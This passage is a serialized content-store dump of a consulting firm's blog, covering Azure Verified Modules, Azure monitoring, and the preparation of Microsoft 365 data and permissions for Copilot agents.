azurerm_linux_virtual_machine",[1257,20744,20745],{},"azurerm_network_interface",[1257,20747,20748],{},"azurerm_managed_disk",[1257,20750,20751],{},"azurerm_virtual_machine_data_disk_attachment",[12,20753,20754],{},"Each of these resources has mandatory parameters that often repeat, such as the resource group name, target region, or resource naming conventions.",[12,20756,20757],{},"With AVM, this is simplified in your code to a single resource containing the necessary parameters, which are then processed further within the module. AVM incorporates Microsoft's most common best practices, so many parameters have default values, eliminating the need for additional configuration steps. 
For example, many modules enforce TLS 1.2 as the default setting or block public access by default.",[41,20759,20761],{"id":20760},"what-if-theres-no-avm-for-my-resource-yet","What If There’s No AVM for My Resource Yet?",[12,20763,31],{},[12,20765,20766],{},"Thanks to AVM’s open-source license, you can use the framework to begin your own development. If a Microsoft employee later decides to create an official AVM resource, your prior work can contribute to the open-source effort.",[41,20768,20770],{"id":20769},"gkvm-glueckkanja-️-open-source","GKVM – glueckkanja ❤️ Open Source",[12,20772,31],{},[12,20774,20775],{},"At glueckkanja, we follow exactly this approach and also support our customers in developing modules based on the AVM framework that are later made publicly available.",[12,20777,20778],{},"We call these modules GKVM (GlueckKanja Verified Modules), because they not only follow AVM requirements but also include our own insights from numerous projects.",[12,20780,20781],{},"GKVM Resource Modules:",[1254,20783,20784,20790,20796],{},[1257,20785,20786],{},[2672,20787,20789],{"href":20788},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-synapse-workspace/azurerm/latest","Azure Synapse Workspace",[1257,20791,20792],{},[2672,20793,20795],{"href":20794},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-iot-hub/azurerm/latest","Azure IoT Hub",[1257,20797,20798],{},[2672,20799,20801],{"href":20800},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-messaging-eventgridsystemtopic/azurerm/latest","Azure Event Grid System Topic",[12,20803,20804],{},"GKVM Pattern Modules:",[1254,20806,20807],{},[1257,20808,20809],{},[2672,20810,20812],{"href":20811},"https://registry.terraform.io/modules/glueckkanja/gkvm-ptn-myworkid/azurerm/latest","My WorkId",[12,20814,20815],{},"Feel free to have a look and file issues, which will enhance the modules even further!",[41,20817,20819],{"id":20818},"further-resources","Further 
Resources",[1254,20821,20822,20828,20834],{},[1257,20823,20824],{},[2672,20825,20827],{"href":20826},"/en/azure/azure-foundation","glueckkanja Azure Foundation",[1257,20829,20830],{},[2672,20831,20833],{"href":20832},"/en/posts/2023-04-14-workload-management-with-azure-foundation","Azure Foundation: Efficient Cloud Management with Terraform",[1257,20835,20836],{},[2672,20837,20840],{"href":20838,"rel":20839},"https://www.terraprovider.com/",[2676],"Terraform Provider for Microsoft 365",{"title":65,"searchDepth":111,"depth":111,"links":20842},[20843,20844,20845,20846,20847],{"id":20686,"depth":111,"text":20687},{"id":20728,"depth":111,"text":20729},{"id":20760,"depth":111,"text":20761},{"id":20769,"depth":111,"text":20770},{"id":20818,"depth":111,"text":20819},{"lang":2171,"seoTitle":20849,"titleClass":2173,"date":20850,"categories":20851,"blogtitlepic":20852,"socialimg":20853,"customExcerpt":20854,"keywords":20855,"contactInContent":20856,"hreflang":20876,"footer":20881,"scripts":20882},"Azure Verified Modules: Standardized Infrastructure as Code with Terraform & Bicep","2025-07-22",[4232],"head-azure-certified.png","/blog/heads/head-azure-certified.png","Infrastructure-as-Code (IaC), especially with Terraform, is a key component of our Azure Foundation and a fundamental element of every cloud transformation. A structured use of IaC accelerates the adoption of cloud services as well as the development of new products. But how do you get started in the best way?","Azure Verified Modules, AVM, Infrastructure as Code, IaC, Terraform, Bicep, Microsoft Best Practices, Azure Module Deployment, Azure Foundation, Open Source Azure, Azure IaC, Azure Automation, automated deployment of Azure resources",{"quote":2168,"infos":20857},{"bgColor":2201,"color":5865,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":20858,"level":41,"textStyling":2204,"flush":2205,"person":20859,"form":20864},"Would you like to learn more about Infrastructure as Code on Azure? 
We are happy to show you how to work faster, more standardized, and more sustainably in the cloud with Azure Verified Modules. Whether you are just getting started or looking for scalable implementation, we support you with experience and best practices. We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":20860,"details":20861},"We look forward to\u003Cbr />hearing from you!",[20862,20863],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":20865,"method":2169,"action":2216,"fields":20866},{"skin":2215},[20867,20868,20869,20870,20872,20874,20875],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":20871,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored with us for processing and responding to your inquiry. 
For more information on data protection, please see our \u003Ca href=\"/en/privacy\">privacy policy\u003C/a>.",{"type":2241,"id":2247,"value":20873},"Form: Blog Azure Verified Modules | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[20877,20879],{"lang":2260,"href":20878},"/de/posts/2025-07-22-azure-certified-modules",{"lang":2263,"href":20880},"/es/posts/2025-07-22-azure-certified-modules",{"noMargin":2181},{"slick":2181},"/posts/2025-07-22-azure-certified-modules",{"title":20680,"description":65},"posts/2025-07-22-azure-certified-modules",[20887,20888,4244,7005],"Infrastructure as Code","Azure Verified Modules","CNBeZ8zongS7Td5L7fUlvsQRGIkTzrzG-Tl_ZAu3jk8",{"id":20891,"title":20892,"author":20893,"body":20894,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":20994,"moment":2166,"navigation":2181,"path":21025,"seo":21026,"stem":21027,"tags":21028,"webcast":2168,"__hash__":21029},"content_en/posts/2025-08-27-azure-monitor.md","Monitoring That Grows With You – Organic Solutions in Azure",[2544],{"type":9,"value":20895,"toc":20986},[20896,20900,20902,20905,20909,20911,20914,20931,20934,20938,20940,20943,20946,20949,20953,20955,20958,20961,20965,20967,20970,20973,20976,20979,20981,20983],[41,20897,20899],{"id":20898},"monitoring-in-azure","Monitoring in Azure",[12,20901,31],{},[12,20903,20904],{},"Monitoring in the cloud is much more than just collecting metrics. In dynamic Azure environments, it’s about capturing relevant information in a targeted way, visualizing it meaningfully, and responding automatically. 
The focus is not only on technical aspects, but also on scalability, cost control, and governance.",[41,20906,20908],{"id":20907},"holistic-monitoring-with-azure-more-than-just-metrics","Holistic Monitoring with Azure – More Than Just Metrics",[12,20910,31],{},[12,20912,20913],{},"A modern monitoring concept in Azure includes various components:",[1254,20915,20916,20919,20922,20925,20928],{},[1257,20917,20918],{},"Azure Monitor as the central platform for metrics, logs, and alerts",[1257,20920,20921],{},"Log Analytics for in-depth analysis and correlation",[1257,20923,20924],{},"Application Insights for application monitoring",[1257,20926,20927],{},"Workbooks and dashboards for visualization",[1257,20929,20930],{},"Action Groups and Logic Apps for automated responses",[12,20932,20933],{},"Monitoring becomes especially valuable when it covers not only cloud-native resources but also hybrid scenarios. With Azure Arc, on-premises systems and other clouds can be seamlessly integrated—including logging, alerting, and policy enforcement. This creates a consistent view across the entire infrastructure.",[41,20935,20937],{"id":20936},"keeping-track-of-changes-and-inventory-change-tracking-inventory","Keeping Track of Changes and Inventory – Change Tracking & Inventory",[12,20939,31],{},[12,20941,20942],{},"An often underestimated aspect of monitoring is tracking changes to resources. With Azure Change Tracking, configuration changes to VMs, files, registry entries, and software installations can be automatically recorded and historically analyzed. This is particularly helpful for root cause analysis of incidents or for meeting compliance requirements.",[12,20944,20945],{},"This is complemented by the Inventory function, which provides a complete overview of installed software, running services, and system configurations—for both Azure VMs and on-premises systems integrated via Azure Arc. 
This creates a central view of the technical state of the environment, which can be seamlessly integrated into existing monitoring and governance structures.",[12,20947,20948],{},"Combined with Log Analytics and automated alerts, Change Tracking becomes a powerful tool for transparent operations, rapid error analysis, and compliant documentation.",[41,20950,20952],{"id":20951},"cost-control-through-targeted-logging","Cost Control Through Targeted Logging",[12,20954,31],{},[12,20956,20957],{},"A common stumbling block in monitoring is cost development due to uncontrolled logging. Azure offers various pricing tiers with Log Analytics, making long-term retention cost-effective. By selecting appropriate retention periods and sampling strategies, costs can be significantly reduced without sacrificing important information.",[12,20959,20960],{},"A structured approach helps to design logging in a targeted and efficient way. Azure Policy plays a key role here: with predefined policies, diagnostic settings can be automatically applied to new resources. This ensures consistency and significantly reduces manual effort.",[41,20962,20964],{"id":20963},"monitoring-in-managed-service","Monitoring in Managed Service",[12,20966,31],{},[12,20968,20969],{},"Effective monitoring starts with a stable and structured foundation. In Azure environments, a landing zone provides the necessary basis to implement governance, security, and operations consistently. This foundation includes not only network infrastructure and identity management, but also a well-thought-out monitoring framework.",[12,20971,20972],{},"Our Azure Foundation demonstrates how this can work: it brings a set of proven alerts, logging configurations, and Azure Policy controls that ensure new resources are automatically configured with the right settings. 
This creates an environment where transparency and operational security are considered from the outset.",[12,20974,20975],{},"On top of this, app zones can be provided for specific applications. These zones are flexible and can be integrated into existing monitoring with tailored alerts and automated logging. This keeps the environment scalable and allows it to grow with requirements—without losing visibility or standardization.",[12,20977,20978],{},"This structure ensures that monitoring is not only technically sound but also strategically scalable. Standards provide consistency, while modularity allows for individual requirements. A managed service can support you by taking over operations, maintenance, and further development. This creates freedom to focus on what really matters—your core business, product development, or business process optimization.",[41,20980,4287],{"id":4286},[12,20982,31],{},[12,20984,20985],{},"Modern monitoring in Azure is a key building block for stable and secure cloud operations. 
Those who focus early on standardization, automation, and cost control lay the foundation for transparency, efficiency, and sustainable growth.",{"title":65,"searchDepth":111,"depth":111,"links":20987},[20988,20989,20990,20991,20992,20993],{"id":20898,"depth":111,"text":20899},{"id":20907,"depth":111,"text":20908},{"id":20936,"depth":111,"text":20937},{"id":20951,"depth":111,"text":20952},{"id":20963,"depth":111,"text":20964},{"id":4286,"depth":111,"text":4287},{"lang":2171,"seoTitle":20892,"titleClass":2173,"date":20995,"categories":20996,"blogtitlepic":20997,"socialimg":20998,"customExcerpt":20999,"keywords":21000,"contactInContent":21001,"hreflang":21018,"footer":21023,"scripts":21024},"2025-08-27",[4232],"head-azure-monitor.png","/blog/heads/head-azure-monitor.png","How modern Azure monitoring creates transparency and leaves room for what matters most","Azure Monitor, Microsoft Best Practices, Azure, Azure Foundation",{"quote":2168,"infos":21002},{"bgColor":2201,"color":5865,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":21003,"level":41,"textStyling":2204,"flush":2205,"person":21004,"form":21008},"Would you like to learn more about Azure? We are happy to show you how to work faster, more standardized, and more sustainably in the cloud with Azure Verified Modules. Whether you are just getting started or looking for scalable implementation, we support you with experience and best practices. 
We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":20860,"details":21005},[21006,21007],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":21009,"method":2169,"action":2216,"fields":21010},{"skin":2215},[21011,21012,21013,21014,21015,21016,21017],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":20871,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":20873},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[21019,21021],{"lang":2260,"href":21020},"/de/posts/2025-08-27-azure-monitor",{"lang":2263,"href":21022},"/es/posts/2025-08-27-azure-monitor",{"noMargin":2181},{"slick":2181},"/posts/2025-08-27-azure-monitor",{"title":20892,"description":65},"posts/2025-08-27-azure-monitor",[20888,4244,7005],"jZjkRgC7YnVKsEAl9GAuvfQrKsINLjJFSFEIhTTPzFc",{"id":21031,"title":21032,"author":21033,"body":21034,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":21712,"moment":2166,"navigation":2181,"path":21784,"seo":21785,"stem":21786,"tags":21787,"webcast":2168,"__hash__":21792},"content_en/posts/2025-08-28-agent-ready-infrastructure copy.md","This is why you need a solid infrastructure to be agent-ready in 
2025",[2525],{"type":9,"value":21035,"toc":21674},[21036,21038,21040,21046,21053,21057,21059,21062,21065,21070,21080,21087,21092,21101,21111,21124,21128,21130,21133,21137,21139,21142,21146,21148,21155,21159,21161,21172,21179,21181,21184,21204,21208,21210,21213,21217,21219,21226,21230,21232,21235,21239,21241,21252,21256,21258,21261,21265,21267,21270,21274,21288,21291,21294,21298,21300,21304,21306,21313,21316,21324,21332,21336,21338,21341,21347,21350,21355,21360,21364,21366,21373,21377,21379,21386,21394,21398,21400,21403,21406,21410,21412,21415,21418,21425,21429,21431,21434,21437,21442,21445,21448,21452,21454,21460,21463,21469,21472,21477,21481,21483,21542,21546,21548,21570,21574,21576,21579,21583,21585,21588,21592,21594,21601,21605,21607,21618,21625,21630,21633,21637,21639,21645,21652,21656,21659,21662,21666,21668,21671],[41,21037,8258],{"id":8257},[12,21039,31],{},[12,21041,21042,21043,1013],{},"With this omnipresence, many ideas and the desire to take action or at least experiment arise. At glueckkanja AG, we support our customers throughout this process. Of course, we are already developing and building agents, but in 80% of our projects, the primary focus is on preparing the data and tenant for agent creation. Before you implement Copilot productively in your organization, it's worthwhile to take a critical look at your infrastructure. When making decisions in this area, there are several important aspects to understand before deploying AI agents on a large scale. That’s why, in this blog post, I will guide you through the essential steps and differences. 
In a time when AI assistants like Microsoft 365 Copilot Agents promise to transform the working world, one principle holds true above all: ",[3456,21044,21045],{},"AI is only as good as the system beneath it",[12,21047,21048,21049,21052],{},"This comprehensive guide outlines ",[251,21050,21051],{},"how to prepare your data and infrastructure"," for Copilot Agents, covering key practices in SharePoint, Teams, and the Power Platform.",[41,21054,21056],{"id":21055},"why-your-infrastructure-data-matters","Why your infrastructure (data) matters",[12,21058,31],{},[12,21060,21061],{},"As we utilize AI agents, it is imperative to understand that these agents do not inherently possess knowledge about our organization, our data, or our unique operational context. By default, an AI agent only carries the built-in knowledge derived from the training of the Large Language Model (LLM). To effectively enhance and extend the capabilities of these AI agents, it is essential to systematically integrate various components. This enhancement can be achieved through the implementation of System Prompts, Knowledge Bases, Connectors, Web-Search functionalities, access to Microsoft Graph, Semantic Search, and additional tools. These components collectively enable the AI agents to deliver more precise, contextually relevant responses and actions, aligning closely with the specific needs and data of the organization. Since we are now at the very beginning of the agentic era, many of us will start with simple agents that source information based on existing SharePoint Online libraries.",[12,21063,21064],{},"For us in IT, that means we need to take care of our data in SharePoint Online more than ever!",[2110,21066,21067],{},[12,21068,21069],{},"SharePoint Online = Knowledge = Data and Data = Key",[12,21071,21072,21075,21076,21079],{},[251,21073,21074],{},"My clear message:"," Before adding AI copilots to your organization, ",[251,21077,21078],{},"get your data house in order",". 
The same data that feeds your Copilot Agents also feeds Microsoft 365 Copilot itself.",[12,21081,21082,21083,21086],{},"And not only that! Microsoft 365 Copilot is assessing the same data. If that data is cluttered, overshared, or poorly secured, the AI could surface incorrect or sensitive information unexpectedly. For example, imagine asking Copilot about company structure and receiving details of a confidential reorganization plan you weren’t meant to see. Such incidents occur when content is ",[251,21084,21085],{},"overshared"," (available too broadly) on platforms like SharePoint or Teams. Note: Copilot respects all existing permissions, which means something like this can only happen when permissions are misconfigured. Conversely, if data is siloed or inaccessible, AI assistants will be less useful.",[2110,21088,21089],{},[12,21090,21091],{},"Copilot only surfaces organizational data that the individual user has at least view permissions for!",[12,21093,21094,540,21097],{},[251,21095,21096],{},"Source:",[2672,21098,21099],{"href":21099,"rel":21100},"https://learn.microsoft.com/en-gb/copilot/microsoft-365/microsoft-365-copilot-privacy?azure-portal=true",[2676],[12,21102,21103,21106,21107,21110],{},[251,21104,21105],{},"Key takeaway:"," Enterprise AI succeeds only with a solid data foundation. A recent Microsoft report identifies ",[251,21108,21109],{},"data oversharing, data leakage, and noncompliant usage"," as top challenges to address before deploying AI. Organizations that invest in preparing SharePoint Online and other data sources will unlock Copilot’s benefits with confidence, while those who don’t risk security breaches or irrelevant AI outputs. 
Studies show about one-third of decision-makers lack full visibility into critical data.",[5137,21112,420,21113,420,21116,420,21118,420,21121],{},[5140,21114],{"media":5142,"srcSet":21115},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics.png",[5140,21117],{"media":5146,"srcSet":21115},[5140,21119],{"media":5150,"srcSet":21120},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics-mob.png",[2642,21122],{"src":21120,"alt":21123},"Two statistics on data risks: 30% of decision-makers lack visibility into business-critical data (Visibility Gap) and 87% of security leaders reported a data breach in the past year (Data Breach Prevalence).",[41,21125,21127],{"id":21126},"_10-steps-to-improve-your-m365-data-infrastructure-now","10 steps to improve your M365 data infrastructure now",[12,21129,31],{},[12,21131,21132],{},"Now we know your agents will need data. When we at glueckkanja step into these projects, this is our typical 10-point list, which we work through from top to bottom with our customers.",[186,21134,21136],{"id":21135},"step-1-check-core-sharing-settings","Step 1: Check Core Sharing Settings",[12,21138,47],{},[12,21140,21141],{},"Verify tenant-wide settings that could lead to oversharing. For example, scrutinize default link sharing policies (e.g. if “Anyone with the link” or “People in your organization” is allowed by default for SharePoint/OneDrive), whether users can create public Teams by default, and if your Power Platform environment is open without governance. Misconfigured defaults here are a common cause of unintentional broad access.",[186,21143,21145],{"id":21144},"step-2-audit-public-teams","Step 2: Audit Public Teams",[12,21147,47],{},[12,21149,21150,21151,21154],{},"Review any Microsoft Teams marked as “Public.” A public Team means ",[3456,21152,21153],{},"anyone in your organization"," can discover and access its content. 
Ensure that any Team set to public truly contains only non-sensitive, broadly suitable content. If not, switch it to private or adjust membership. (It’s easy for a Team to be created as Public and later forgotten, exposing files to all employees.)",[186,21156,21158],{"id":21157},"step-3-review-graph-connectors","Step 3: Review Graph Connectors",[12,21160,47],{},[12,21162,21163,21164,21167,21168,21171],{},"Check if your tenant has any ",[3456,21165,21166],{},"Microsoft Graph Connectors"," set up that pull in third-party data (e.g. from external file systems, wikis, etc.). Remove or secure any connector that indexes data not everyone should see. ",[251,21169,21170],{},"Why?"," Content indexed via Graph Connectors becomes part of your Microsoft Graph search index – meaning Copilot can potentially use it to answer prompts. You only want relevant, intended data sources connected.",[186,21173,21175,21176],{"id":21174},"step-4-generate-a-sharepoint-online-baseline-report","Step 4: Generate a ",[251,21177,21178],{},"SharePoint Online Baseline Report",[12,21180,47],{},[12,21182,21183],{},"SPO has different possible risks for unwanted data in Agents and Copilot. You need to look for different key metrics:",[1254,21185,21186,21189,21192,21195,21198,21201],{},[1257,21187,21188],{},"Broken Permission Inheritance on a folder-level",[1257,21190,21191],{},"Public SharePoint Sites",[1257,21193,21194],{},"Use of \"Everyone Except External Users\" or other dynamic group that contain all users",[1257,21196,21197],{},"Anyone Sharing Links",[1257,21199,21200],{},"Everyone-in-my-org Sharing Links",[1257,21202,21203],{},"Unwanted people in the Site Admins / Owners / Members / Visitors Group",[186,21205,21207],{"id":21206},"step-5-categorize-and-prioritize-risks","Step 5: Categorize and Prioritize Risks",[12,21209,47],{},[12,21211,21212],{},"Take the findings from Steps 1–4 and rank them by severity. 
Which sites or files carry the most business-critical or sensitive data and also have exposure risks? Prioritize fixing those. By layering business context (e.g., a site with financial data vs. a site with generic templates), you can focus on the most impactful issues first.",[186,21214,21216],{"id":21215},"step-6-involve-site-owners-for-access-reviews","Step 6: Involve Site Owners for Access Reviews",[12,21218,47],{},[12,21220,21221,21222,21225],{},"For each SharePoint site (or Team) highlighted as risky, have the site owner double-check who has access and if that is appropriate. Owners are typically closest to the content and can quickly spot “Oh, why does ",[3456,21223,21224],{},"Everyone"," have read access to this? That shouldn’t be.” Implement a process where site admins certify permissions regularly.",[186,21227,21229],{"id":21228},"step-7-establish-ongoing-oversight","Step 7: Establish Ongoing Oversight",[12,21231,47],{},[12,21233,21234],{},"Put in place a continuous monitoring process for new oversharing issues. Oversharing control isn’t a one-time fix; as new sites, Teams, and files get created, you need to catch misconfigurations proactively. Consider using Microsoft Purview’s reports or alerts to catch things like files shared externally or to huge groups, new public teams created, etc. Microsoft’s tools can automate alerts for these conditions, so make use of them to maintain a strong posture.",[186,21236,21238],{"id":21237},"step-8-apply-sensitivity-labels-and-dlp-policies","Step 8: Apply Sensitivity Labels and DLP Policies",[12,21240,47],{},[12,21242,21243,21244,21247,21248,21251],{},"Use Microsoft Purview ",[251,21245,21246],{},"Sensitivity Labels"," to classify data (Confidential, Highly Confidential, etc.) and bind those labels to protection settings. For instance, a “Confidential” label can encrypt files or prevent external sharing. 
Also configure ",[251,21249,21250],{},"Data Loss Prevention (DLP)"," policies to prevent or monitor oversharing of sensitive info (like blocking someone from emailing a list of customer SSNs). These tools not only prevent accidental leaks in day-to-day use, they also work with Copilot: if Copilot tries to access or output labeled content in ways it shouldn’t, DLP can intervene. Moreover, Copilot itself will carry forward the document’s label to its responses, as noted later.",[186,21253,21255],{"id":21254},"step-9-implement-power-platform-governance","Step 9: Implement Power Platform Governance",[12,21257,47],{},[12,21259,21260],{},"Extend your oversight to the Power Platform (Power Apps, Power Automate, etc.). Define DLP policies for Power Platform to control connectors (so someone can’t, say, make a flow that pulls data from a sensitive SharePoint list and posts it to an external service). Also consider having multiple environments (Dev/Test/Prod) with proper security so that “Citizen Developers” building agents or apps don’t inadvertently expose data. Essentially, prevent the Power Platform from becoming an ungoverned backdoor to your data.",[186,21262,21264],{"id":21263},"step-10-educate-and-enable-your-agent-builders","Step 10: Educate and Enable Your Agent Builders",[12,21266,47],{},[12,21268,21269],{},"Finally, create guidelines and best practices for those who will be building or deploying AI agents (whether they are pro developers or business users). Establish training on handling data safely: e.g., how to choose appropriate knowledge sources for an agent, why not to include sensitive files in a broadly shared agent, how to test an agent’s output for any unexpected info. 
By fostering a data-aware culture among “agent makers,” you reduce the chance of someone inadvertently exposing information when designing an AI solution.",[12,21271,21272],{},[251,21273,4127],{},[1254,21275,21276,21282],{},[1257,21277,21278],{},[2672,21279,21280],{"href":21280,"rel":21281},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/from-oversharing-to-optimization-deploying-microsoft-365-copilot-with-confidence/4357963",[2676],[1257,21283,21284],{},[2672,21285,21286],{"href":21286,"rel":21287},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/microsoft-graph-connectors-update-expand-copilot%E2%80%99s-knowledge-with-50-million-ite/4243648",[2676],[12,21289,21290],{},"After you have completed these steps, you can securely go on and start building productive agents. To build agents, we have different platforms and features from Microsoft that we can rely on. You'll find the most prominent examples in the next chapter. If you need help with this list, feel free to reach out to us so we can help you with this important preparation exercise.",[12,21292,21293],{},"In the meantime, nothing prevents you from creating PoC or test agents with sample data, manually uploaded files or specific data attached via RAG. But we recommend these steps before a larger implementation / rollout of agents.",[41,21295,21297],{"id":21296},"understanding-differences-between-agent-platforms","Understanding differences between Agent Platforms",[12,21299,31],{},[186,21301,21303],{"id":21302},"step-1-understand-your-agent-creators","Step 1: Understand your Agent-Creators",[12,21305,47],{},[12,21307,21308,21309,21312],{},"After the foundation work to prepare the data, we need to understand which platforms are available to create those agents. We try to differentiate these tools by features and possibilities, but it's important to note that creating agents and choosing the right tooling is a spectrum. 
There are multiple ways to build AI agents in the Microsoft ecosystem. It’s important to pick the right one for your needs and your team’s skill level. It also clarifies when to leverage ",[251,21310,21311],{},"Azure AI Foundry"," versus built-in Copilot Studio tools.",[12,21314,21315],{},"Microsoft offers a set of different tools that can build agents today. While they look similar, they are built for different target audiences and levels of expertise. Take a closer look at the overview below. Understanding who needs to create and maintain these agents also shows us which knowledge sources (= data) we need to prepare for our agents. Besides the tools in the list below, there are even more pro-code solutions to build agents, like M365 Agents Toolkit, Visual Studio Code, Agent SDK and more. All our data preparation steps apply to them as well, since they access the same data as other agents do.",[12,21317,21318,540,21320],{},[251,21319,21096],{},[2672,21321,21322],{"href":21322,"rel":21323},"https://www.egroup-us.com/news/microsoft-copilot-ai-integration/",[2676],[5137,21325,420,21326,420,21329],{},[5140,21327],{"media":5142,"srcSet":21328},"https://res.cloudinary.com/c4a8/image/upload/v1756363984/blog/pics/table-copilot-ai-integration.png",[2642,21330],{"src":21328,"alt":21331},"Comparison of three Copilot solution categories: Pre-Built (ootb), Makers, and Developers.",[186,21333,21335],{"id":21334},"step-2-identify-use-cases-and-requirements-for-your-platform","Step 2: Identify Use Cases and requirements for your platform",[12,21337,47],{},[12,21339,21340],{},"As you can probably imagine, not every platform supports every use case. Agents can be used for simple tasks, like answering questions based on existing knowledge, or complex ones, like automatically generating answers or executing processes. 
Also, the final UX, where and how we want to access those agents, is important when deciding on a platform.",[12,21342,21343],{},[2642,21344],{"alt":21345,"src":21346},"Diagram showing three levels of agent capabilities from simple to advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/agents-differences.png",[12,21348,21349],{},"With these considerations in mind, we usually try to use the easiest solution possible to build our Agent. But we also need to find the solution that is scalable for further development. Not every Agent needs to be built on Azure AI Foundry from the very beginning.",[12,21351,21352],{},[251,21353,21354],{},"Tip:",[2110,21356,21357],{},[12,21358,21359],{},"If you are not sure where to start building your Agent, you can always use Copilot Studio, integrate more data from Azure AI there and publish it to Microsoft 365 Copilot. So you get both \"up- and downwards compatibility\".",[41,21361,21363],{"id":21362},"rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG (Retrieval-Augmented Generation) vs. SharePoint vs. Upload",[12,21365,31],{},[12,21367,21368,21369,21372],{},"Looking at it the first time, everything seems to be RAG – but there are differences! When you first explore Copilot Agents and its agent capabilities, it’s tempting to assume that all knowledge integration follows the same RAG (Retrieval-Augmented Generation) pattern. While they may all ",[3456,21370,21371],{},"look"," like RAG from the outside: retrieving documents and generating answers, the way they work under the hood differs significantly. Understanding these differences is essential for choosing the right approach based on your goals, scale, and technical readiness. Here is a short explanation and overview.",[186,21374,21376],{"id":21375},"manual-file-uploads","Manual File Uploads",[12,21378,47],{},[12,21380,21381,21382,21385],{},"Manual upload is the simplest way to add knowledge to a Copilot agent. 
You drag and drop documents directly into the Copilot Studio interface. Microsoft automatically indexes these files and retrieves relevant content during a user query. This is ideal for small pilots and early testing. ",[251,21383,21384],{},"Also, be aware that the content of the files is accessible to everyone who has access to the agent",". There is no permission management at this level, so only upload content that every user of the agent is allowed to see. On the other hand, you will need to update these files manually in the long term if things change. Currently you can add up to 20 files manually to a Copilot agent.",[12,21387,21388,21389],{},"Source: ",[2672,21390,21393],{"href":21391,"rel":21392},"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge",[2676],"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge#file-size-limits",[186,21395,21397],{"id":21396},"sharepoint-online","SharePoint Online",[12,21399,47],{},[12,21401,21402],{},"This method uses Microsoft’s Retrieval API to access content directly from SharePoint Online connected via Graph Connector. The agent retrieves the most relevant content live at query time, respecting existing Microsoft 365 permissions. Content can be SharePoint sites, document libraries, folders or files. It’s dynamic, secure, and well-suited for scaling across departments or business units without managing your own infrastructure. Building on the existing infrastructure, we use SharePoint’s built-in security model, which is a huge benefit compared to other knowledge options. Departments can easily update the files, and the changes are reflected in the agent. 
That means if two users with different access levels ask the agent, one might get an answer from a certain file while another user (without access) would not – which is exactly the behavior we want.",[12,21404,21405],{},"Note: SharePoint lists are currently not a supported knowledge type, so you cannot index them out of the box (as of Q3 2025).",[186,21407,21409],{"id":21408},"custom-rag-self-managed","Custom RAG (Self-Managed)",[12,21411,47],{},[12,21413,21414],{},"In a classic RAG setup, you build and manage the entire retrieval pipeline yourself. That includes document preprocessing, chunking, embedding, storing in a vector database, and retrieving the top matches at query time. This gives you full control over how content is processed and retrieved, but it also brings complexity and maintenance overhead. It’s best suited for advanced use cases that require customization beyond what Microsoft’s managed services offer. This is not a built-in feature of Copilot or Copilot Studio; we would build it in Microsoft Azure.",[12,21416,21417],{},"An example of when to use custom RAG: if you need to integrate an AI agent with a proprietary database or thousands of PDFs stored outside of Microsoft 365, and apply custom filters, a self-managed RAG pipeline might be necessary – but this requires significant effort.",[12,21419,21420,21421],{},"Source: ",[2672,21422,21423],{"href":21423,"rel":21424},"https://learn.microsoft.com/en-us/azure/search/retrieval-augmented-generation-overview?tabs=docs",[2676],[186,21426,21428],{"id":21427},"what-to-choose-and-when","What to Choose and When",[12,21430,47],{},[12,21432,21433],{},"While all three approaches involve retrieving content to support language generation, only the custom self-managed solution qualifies as “true RAG” in the technical sense. For most organizations starting out, manual uploads or SharePoint connections are significantly easier and faster to implement. 
They provide strong results with minimal setup - and they let teams focus on use case design and adoption, rather than infrastructure.",[12,21435,21436],{},"A general piece of advice from my side at this point:",[2110,21438,21439],{},[12,21440,21441],{},"Try to build the agents as close to your data as possible",[12,21443,21444],{},"Example: if your data is stored in large SQL databases or external CRM systems, a SharePoint agent will not do the job. If all your knowledge is in SharePoint, SharePoint agents or Copilot agents might be a good start.",[12,21446,21447],{},"Custom RAG should be considered only when your needs go beyond what the managed options can provide, not as the default starting point. A manual upload is great for a first pilot or for small pilots with limited, specific knowledge that is not updated often. In many scenarios we would just use a SharePoint library or site with the agent. Because of this, we focus on a scenario that looks like this:",[41,21449,21451],{"id":21450},"microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","Microsoft 365 Copilot & Copilot Agents: Security & Compliance out of the box",[12,21453,31],{},[12,21455,21456,21459],{},[251,21457,21458],{},"Secure cloud infrastructure"," is the bedrock for enterprise AI. By running agents in the context of Microsoft 365 Copilot, Microsoft lets every organization reuse its existing security framework (Conditional Access and multi-factor authentication for access) and its existing governance framework (Microsoft Purview).",[12,21461,21462],{},"Agents used in M365 Copilot or published from Copilot Studio as a Teams chatbot are only accessible within our 